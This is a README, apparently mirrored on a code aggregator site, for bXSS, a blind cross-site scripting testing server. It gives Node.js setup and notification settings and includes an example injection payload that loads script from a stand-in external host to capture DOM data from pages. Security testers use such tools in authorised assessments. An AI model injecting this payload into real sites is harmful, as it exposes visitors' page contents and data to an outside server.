Giter VIP home page Giter VIP logo

bxss's Introduction

bXSS

bXSS is a Blind XSS application adapted from https://cure53.de/m, you can read about it here.

Gif of BlindXSS

bXSS supports the following:

Requirements

Step-Up

Default

  • cd bXSS && npm install
  • Update The Configuration || Environment Variables
    • Domain
      • config.url = Domain intended for use e.g ardern.io
      • config.port = Port to run the Node.js app e.g 3030
    • Twilio (Optional, if you don't want to use Twilio just delete all Twilio references from the config)
    • Slack (Optional, if you don't want to use Slack just delete all Slack references from the config)
    • Cisco (Optional, if you don't want to use Cisco just delete all Cisco references from the config)
    • Gmail (Optional, if you don't want to use Gmail just delete all Gmail references from the config)
      • config.gmail.user = Gmail Username
      • config.gmail.pass = Gmail Password
      • config.gmail.to = ['[email protected]','[email protected]'] Where you want to send the emails
      • config.gmail.from = Who sent the message, usually Gmail Username
    • Rename configExample.js to config.js
  • Start your app (depending on your preference)
    • node app.js
    • pm2 start app.js
    • nodemon app.js

Additional Steps (Optional)

  • Obtain a let's Encrypt cert
  • I would recommend looking at setting up a reverse proxy, for example in NGINX and skip the next step as I wouldn't want anyone to run express as root.
  • Using Node.js
    • Update Configuration
      • config.letsEncrypt.TLS = true;
      • config.letsEncrypt.publicKey = $Path/fullchain.pem
      • config.letsEncrypt.privateKey = $Path/privkey.pem
      • config.letsEncrypt.ca = $Path/chain.pem
  • Start your app (depending on your preference)
    • node app.js
    • npm2 start app.js
    • nodemon app.js

Using

Once the application is funcitonal, you would just identify sites you are authorized to test and start to inject different payloads that will attempt to load your resource, the easiest example is:

"><script src="https://example.com/m"></script>

The application has three core functions

  • POST - /m (captures DOM information)
  • GET - /m (Loads the payload)
  • Payloads - /payloads (Gives payloads you can use for testing blind xss)
  • Everything else - Loads alert(1)

Contribute?

If you like the project, feel free to contribute or if you want to suggest improvements or notice any problems, file a issue.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.